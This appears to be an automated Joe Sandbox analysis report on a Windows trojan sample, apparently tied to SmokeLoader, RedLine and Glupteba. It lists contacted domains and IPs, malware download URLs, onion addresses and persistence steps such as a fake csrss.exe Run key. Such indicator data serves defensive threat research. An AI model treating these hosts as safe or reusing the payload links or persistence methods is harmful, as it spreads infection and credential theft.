roguemedia.com.au	118.88.24.31	true	false	0%, Virustotal, Browse	unknown
mail.economicnudity.com	50.87.253.230	true	false		unknown
ebourneimages.com	46.30.215.34	true	false	0%, Virustotal, Browse	unknown
progressivestaffingsolutions.com	198.50.197.49	true	false	0%, Virustotal, Browse	unknown
esaaudit-expertise.com	92.222.139.190	true	false		unknown
ni-spamexperts.guzel.net.tr	185.106.211.36	true	false	0%, Virustotal, Browse	unknown
everystep.org	52.2.219.184	true	false	0%, Virustotal, Browse	unknown
dbt43jimgm1f3.cloudfront.net	18.173.166.109	true	false		high
mail.protonmail.ch	185.70.42.128	true	false	0%, Virustotal, Browse	unknown
12065.bodis.com	199.59.243.225	true	false		high
stadiumgm.com	13.35.116.85	true	false	0%, Virustotal, Browse	unknown
timsoter.com	148.62.5.7	true	false	0%, Virustotal, Browse	unknown
hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com	34.205.242.146	true	false		high
bhbmail.com	195.62.32.44	true	false	0%, Virustotal, Browse	unknown
schtuph.com	127.0.0.1	true	false	0%, Virustotal, Browse	unknown
stadiumgm.com.dlr.sincrod.com	13.35.116.101	true	false		unknown
stualialuyastrelia.net	91.215.85.17	true	true	23%, Virustotal, Browse	unknown
oceanpower.com.hk	114.142.153.182	true	false	0%, Virustotal, Browse	unknown
eedoh.com	74.208.236.145	true	false	0%, Virustotal, Browse	unknown
humydrole.com	95.86.30.3	true	true	16%, Virustotal, Browse	unknown
mikeandamy.com.au	35.239.84.205	true	false	0%, Virustotal, Browse	unknown
schlitzohren.com	194.191.24.29	true	false	0%, Virustotal, Browse	unknown
pedrodomarketing.com	15.197.142.173	true	false		unknown
mail.anstac.com.my	85.187.128.38	true	false		unknown
mx-biz.mail.am0.yahoodns.net	67.195.204.83	true	false	0%, Virustotal, Browse	unknown
mx.spamexperts.com	38.111.198.185	true	false		high
mail.longboat-systems.com	107.180.41.145	true	false		unknown
shpilliwilli.com	172.67.215.49	true	true	16%, Virustotal, Browse	unknown
haijiao.com	172.64.206.12	true	false	0%, Virustotal, Browse	unknown
longboat-systems.com	107.180.41.145	true	false	0%, Virustotal, Browse	unknown
avocatnumerus.com	212.83.164.84	true	false		unknown
piratedrecords.com	198.185.159.145	true	false		unknown
anstac.com.my	104.21.31.119	true	false		unknown
dermatomontreal-com.mail.protection.outlook.com	104.47.75.228	true	false		high
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true	false		unknown
jose.net.au	3.33.130.190	true	false		unknown
mx1-us1.ppe-hosted.com	67.231.154.162	true	false		unknown
bombertublestylebanws.fun	172.67.167.227	true	false		unknown
vmdoc.com	199.59.243.225	true	false		unknown
westportseafoodinc.com	162.255.119.203	true	false		unknown
geigerlawfirm.com	23.23.160.47	true	false		unknown
hri.us.com	45.56.79.23	true	false		unknown
turkelimedya.com.tr	89.252.182.35	true	false		unknown
vibeisalive.com	216.239.32.21	true	false		unknown
www.ebourneimages.com	46.30.215.34	true	false		unknown
admartproducts.com	63.141.128.13	true	false		unknown
hashpharmaksa.com	50.63.12.208	true	false		unknown
hillofbeans-us.mail.protection.outlook.com	104.47.55.138	true	false		high
ASPMX5.GOOGLEMAIL.com	142.250.27.27	true	false		unknown
smart-alas.comule.com	153.92.0.100	true	false		unknown
alt3.gmr-smtp-in.l.google.com	64.233.184.14	true	false		high
mx1.pub.mailpod11-cph3.one.com	104.37.34.230	true	false		high
mx.zoho.com	204.141.43.44	true	false		high
thermax-europe.com	45.76.130.182	true	false		unknown
alt4.aspmx.l.google.com	142.250.27.27	true	false		high
nicholsonblunt.com	198.185.159.144	true	false		unknown
nocerramosnunca.com	217.160.0.144	true	false		unknown
west.smtp.mx.exch030.serverdata.net	199.193.206.96	true	false		high
robomaster.com	118.31.181.8	true	false		unknown
mx1.dnsxperta.com	83.147.63.42	true	false		unknown
vps1.sonicrevolutions.com	37.97.129.90	true	false		unknown
kraehahn.com	217.160.0.41	true	false		unknown
epgridiron.com	64.34.103.208	true	false		unknown
ftpvoyager.cc	211.171.233.129	true	true		unknown
quantumtys.com	104.21.6.222	true	false		unknown
fisher-studios.com	198.46.82.240	true	false		unknown
dacconsultants.com	217.13.93.44	true	false		unknown
mxbiz2.qq.com	43.154.252.16	true	false		high
mx.nfmoi.com	157.7.144.15	true	false		unknown
hotel-sanlorenzo.com	217.182.37.74	true	false		unknown
mdp.com.ar	190.183.60.131	true	false		unknown
hillofbeans.us	3.33.130.190	true	false		unknown
liuliuoumumy.org	34.143.166.163	true	true		unknown
mail.bletgen.net	188.40.218.37	true	false		unknown
positivestart-com-au.mail.protection.outlook.com	104.47.71.202	true	false		high
mx00.1and1.com	74.208.5.3	true	false		high
neighborhoodfeelsa.fun	172.67.143.130	true	true		unknown
ext-sq.squarespace.com	198.185.159.144	true	false		high
spro5.fcomet.com	50.116.52.228	true	false		high
linkofstrumble.com	104.21.88.149	true	true		unknown
gms4law.com	3.33.130.190	true	false		unknown
ifmga.org	185.230.63.107	true	false		unknown
ghs.google.com	142.250.189.147	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://liuliuoumumy.org/	true	URL Reputation: safe	unknown
http://bombertublestylebanws.fun/api	false	Avira URL Cloud: malware	unknown
http://tonimiuyaytre.org/	true	URL Reputation: safe	unknown
https://shpilliwilli.com/288c47bbc1871b439df19ff4df68f076.exe	true	Avira URL Cloud: malware	unknown
http://humydrole.com/tmp/index.php	true	URL Reputation: safe	unknown
https://linkofstrumble.com/dad9b3a52c30c4733cf934e71716b3dc/288c47bbc1871b439df19ff4df68f076.exe	true	Avira URL Cloud: malware	unknown
ratefacilityframw.fun	true	Avira URL Cloud: safe	unknown
neighborhoodfeelsa.fun	true	Avira URL Cloud: malware	unknown
http://diagramfiremonkeyowwa.fun/api	false	Avira URL Cloud: malware	unknown
http://ftpvoyager.cc/ftp/index.php	true	Avira URL Cloud: malware	unknown
cakecoldsplurgrewe.pw	true	Avira URL Cloud: malware	unknown
http://tyiuiunuewqy.org/	true	URL Reputation: safe	unknown
http://snukerukeutit.org/	false	URL Reputation: safe	unknown
http://stualialuyastrelia.net/	true	URL Reputation: safe	unknown
http://cream.hitsturbo.com/order/tuc5.exe	true	Avira URL Cloud: malware	unknown
dayfarrichjwclik.fun	true	Avira URL Cloud: malware	unknown
opposesicknessopw.pw	true	URL Reputation: safe	unknown
http://sumagulituyo.org/	false	URL Reputation: malware	unknown
reviveincapablewew.pw	true	Avira URL Cloud: malware	unknown
politefrightenpowoa.pw	true	URL Reputation: malware	unknown
http://neighborhoodfeelsa.fun/api	false	Avira URL Cloud: malware	unknown
http://lightseinsteniki.org/	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000002.00000000.2025009942.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://diagramfiremonkeyowwa.fun/1H	4294.exe, 00000008.00000002.2397262813.000000000077D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://bombertublestylebanws.fun/	4294.exe, 00000008.00000002.2397262813.000000000077D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://invalidlog.txtlookup	6F54.exe	false	URL Reputation: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000002.00000000.2027054636.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://yandex.com/bots)Opera	6F54.exe	false		high
https://excel.office.com	explorer.exe, 00000002.00000000.2025009942.0000000009B79000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerr	6F54.exe	false		high
http://schemas.micro	explorer.exe, 00000002.00000000.2024636240.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2024208207.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2024614661.0000000008870000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://diagramfiremonkeyowwa.fun/apiR	4294.exe, 00000008.00000002.2397262813.000000000074E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://aia.startssl.com/certs/sca.code3.crt06	3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.startssl.com/sfsca.crl0f	3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://devlog.gregarius.net/docs/ua)Links	6F54.exe	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	3EBB.exe, 00000007.00000003.2355444891.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2357874414.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356349485.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2358545994.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2359461162.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2362618248.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355663407.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356967990.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356491235.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356234188.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355558887.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356967990.000001D435AD7000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355313569.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://diagramfiremonkeyowwa.fun/x	4294.exe, 00000008.00000002.2397262813.000000000077D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.startssl.com/sca-code3.crl0#	3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://grub.org)Mozilla/5.0	6F54.exe	false	Avira URL Cloud: safe	low
https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize	6F54.exe	false	Avira URL Cloud: safe	unknown
http://www.avantbrowser.com)MOT-V9mm/	6F54.exe	false	Avira URL Cloud: safe	low
https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill	6F54.exe	false		high
http://diagramfiremonkeyowwa.fun/l	4294.exe, 00000008.00000002.2397262813.000000000077D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000002.00000000.2027054636.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://diagramfiremonkeyowwa.fun/lr	4294.exe, 00000008.00000002.2397262813.000000000077D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://diagramfiremonkeyowwa.fun/apiMy	4294.exe, 00000008.00000002.2397262813.0000000000775000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.python.org/dev/peps/pep-0205/	3EBB.exe, 00000007.00000003.2363289109.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://turnitin.com/robot/crawlerinfo.html)cannot	6F54.exe	false		high
http://www.exabot.com/go/robot)Opera/9.80	6F54.exe	false	URL Reputation: safe	unknown
http://www.bloglines.com)Frame	6F54.exe	false	Avira URL Cloud: safe	low
http://diagramfiremonkeyowwa.fun/xv	4294.exe, 00000008.00000002.2397262813.000000000077D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.googlebot.com/bot.html)Links	6F54.exe	false	URL Reputation: safe	unknown
https://wns.windows.com/)s	explorer.exe, 00000002.00000000.2025009942.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://dayfarrichjwclik.fun/	4294.exe, 00000008.00000002.2397262813.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://search.msn.com/msnbot.htm)net/http:	6F54.exe	false		high
http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.0	6F54.exe	false	URL Reputation: safe	unknown
http://www.google.com/bot.html)crypto/ecdh:	6F54.exe	false		high
http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:	6F54.exe	true	Avira URL Cloud: safe	unknown
http://2pkktxkf3gnpcjh2bhi62arz2ieyjgxocb3jne3kc2nu2yvyxqq23nad.onionC:	6F54.exe, 00000021.00000002.2594000287.000000000C1E2000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	3EBB.exe, 00000007.00000003.2355444891.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2357874414.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356349485.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2358545994.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2359461162.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2362618248.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355663407.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356967990.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356491235.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356234188.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355558887.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356967990.000001D435AD7000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355313569.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://search.msn.com/msnbot.htm)msnbot/1.1	6F54.exe	false		high
http://ocsp.startssl.com07	3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://blockstream.info/apiinva	6F54.exe	false	URL Reputation: safe	unknown
http://www.archive.org/details/archive.org_bot)Opera/9.80	6F54.exe	false		high
http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4	6F54.exe	false		high
http://yandex.com/bots)Opera/9.51	6F54.exe	false		high
http://www.spidersoft.com)	6F54.exe	false	Avira URL Cloud: safe	low
http://www.google.com/bot.html)Mozilla/5.0	6F54.exe	false		high
http://www.startssl.com/policy0	3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.startssl.com00	3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000002.00000000.2025009942.0000000009B79000.00000004.00000001.00020000.00000000.sdmp	false		high
http://archive.org/details/archive.org_bot)Mozilla/5.0	6F54.exe	false		high
http://neighborhoodfeelsa.fun/	4294.exe, 00000008.00000002.2397262813.000000000077D000.00000004.00000020.00020000.00000000.sdmp, 4294.exe, 00000008.00000002.2397262813.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency	6F54.exe	false	URL Reputation: safe	unknown
http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD	6F54.exe	false		high
http://diagramfiremonkeyowwa.fun/apiX	4294.exe, 00000008.00000002.2397262813.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.google.c	6F54.exe	false	URL Reputation: safe	unknown
http://aia.startssl.com/certs/ca.crt0	3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://diagramfiremonkeyowwa.fun/	4294.exe, 00000008.00000002.2397262813.000000000077D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.google.com/feedfetcher.html)HKLM	6F54.exe	false		high
https://sabotage.net	2788.exe, 00000006.00000003.3248305380.00000000034E2000.00000004.00000020.00020000.00000000.sdmp, 2788.exe, 00000006.00000003.3254011016.00000000037A9000.00000004.00000020.00020000.00000000.sdmp, 2788.exe, 00000006.00000003.3247664296.0000000003378000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2023573393.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.startssl.com/0P	3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://diagramfiremonkeyowwa.fun/apib	4294.exe, 00000008.00000002.2397262813.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://blockchain.infoindex	6F54.exe	false	URL Reputation: safe	unknown
https://www.openssl.org/H	3EBB.exe, 00000007.00000003.2357874414.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://dayfarrichjwclik.fun/api	4294.exe, 00000008.00000002.2397262813.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com/	explorer.exe, 00000002.00000000.2025009942.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://localhost:3433/https://duniadekho.baridna:	6F54.exe	true	Avira URL Cloud: safe	low
http://search.msn.com/msnbot.htm)pkcs7:	6F54.exe	false		high
http://crl.v	explorer.exe, 00000002.00000000.2022279576.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.alexa.com/help/webmasters;	6F54.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.215.49	shpilliwilli.com	United States	13335	CLOUDFLARENETUS	true
171.25.193.9	unknown	Sweden	198093	DFRI-ASForeningenfordigitalafri-ochrattigheterSE	false
34.143.166.163	lightseinsteniki.org	United States	2686	ATGS-MMD-ASUS	true
104.198.2.251	snukerukeutit.org	United States	15169	GOOGLEUS	false
198.50.191.95	unknown	Canada	16276	OVHFR	false
204.13.164.118	unknown	United States	25700	25700US	false
34.94.245.237	sumagulituyo.org	United States	15169	GOOGLEUS	false
104.21.88.149	linkofstrumble.com	United States	13335	CLOUDFLARENETUS	true
144.172.118.5	unknown	United States	46261	QUICKPACKETUS	false
104.21.18.224	diagramfiremonkeyowwa.fun	United States	13335	CLOUDFLARENETUS	false
15.204.234.61	unknown	United States	71	HP-INTERNET-ASUS	false
172.67.167.227	bombertublestylebanws.fun	United States	13335	CLOUDFLARENETUS	false
167.114.144.152	unknown	Canada	16276	OVHFR	false
51.15.246.170	unknown	France	12876	OnlineSASFR	false
211.171.233.129	ftpvoyager.cc	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
5.9.43.211	unknown	Germany	24940	HETZNER-ASDE	false
172.67.143.130	neighborhoodfeelsa.fun	United States	13335	CLOUDFLARENETUS	true
172.67.168.30	cream.hitsturbo.com	United States	13335	CLOUDFLARENETUS	true
217.160.114.209	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
188.213.49.109	unknown	Romania	44220	PARFUMURI-FEMEI-ASRO	false
104.57.231.27	unknown	United States	7018	ATT-INTERNET4US	false
91.215.85.17	stualialuyastrelia.net	Russian Federation	34665	PINDC-ASRU	true
95.86.30.3	humydrole.com	Macedonia	49056	INEL-AS-MK	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1365943
Start date and time:	2023-12-22 04:56:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	HVqTxn73uD.exe renamed because original name is a hash value
Original Sample Name:	68ffed54965b0f0695d96e4b507ce795.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@47/964@469/24
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Connection to analysis system has been lost, crash info: Unknown
Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:57:00	API Interceptor	83247x Sleep call for process: explorer.exe modified
04:57:11	Task Scheduler	Run new task: Firefox Default Browser Agent 8714996F2BFA2406 path: C:\Users\user\AppData\Roaming\sfriduf
04:57:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
04:57:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
04:57:40	API Interceptor	9x Sleep call for process: 6F54.exe modified
04:57:44	API Interceptor	21x Sleep call for process: powershell.exe modified
04:57:58	Task Scheduler	Run new task: Firefox Default Browser Agent FCFA8C00AE278F7D path: C:\Users\user\AppData\Roaming\fcriduf
04:58:02	API Interceptor	1760x Sleep call for process: 2788.exe modified
04:58:15	API Interceptor	5383x Sleep call for process: csrss.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.215.49	jcY9CjvBDG.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	zEiSxvfImr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse
	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	3XbeWk4htl.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader	Browse
	M6xATHbwxY.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse
171.25.193.9	R53a3ZJHBQ.exe	Get hash	malicious	SystemBC	Browse	171.25.193.9/tor/status-vote/current/consensus
	x3WX1kHqcx.exe	Get hash	malicious	SystemBC	Browse	171.25.193.9/tor/status-vote/current/consensus
	oGO7Hy4YCH.exe	Get hash	malicious	SystemBC	Browse	171.25.193.9/tor/status-vote/current/consensus
	SPXp2YHDFz.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	ILI1MGzcig.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	lwRhzjuYIg.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	OVrJ9mtD6Y.exe	Get hash	malicious	TinyNuke	Browse	171.25.193.9/tor/status-vote/current/consensus
	F75rJPKdGb.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	ozJy5Zf5cf.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	zfpLjnr5P9.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	kecFPnbu5K.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	SecuriteInfo.com.Trojan.Kronos.21.31435.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	530000.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	6d0000.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	6729001591617.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	NNrUb9Avaw.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	taugif.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	9WajXSHVwg.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	bill4759.doc	Get hash	malicious		Browse	171.25.193.9/tor/status-vote/current/consensus
	bill notice 05.2019.xls	Get hash	malicious		Browse	171.25.193.9/tor/status-vote/current/consensus

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lightseinsteniki.org	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	ZRgv8wdMtR.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	zEiSxvfImr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	3yPvcmrbqS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
